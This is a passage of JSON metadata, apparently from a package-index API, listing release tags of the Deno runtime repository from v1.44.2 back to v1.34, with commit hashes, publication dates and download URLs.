","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbd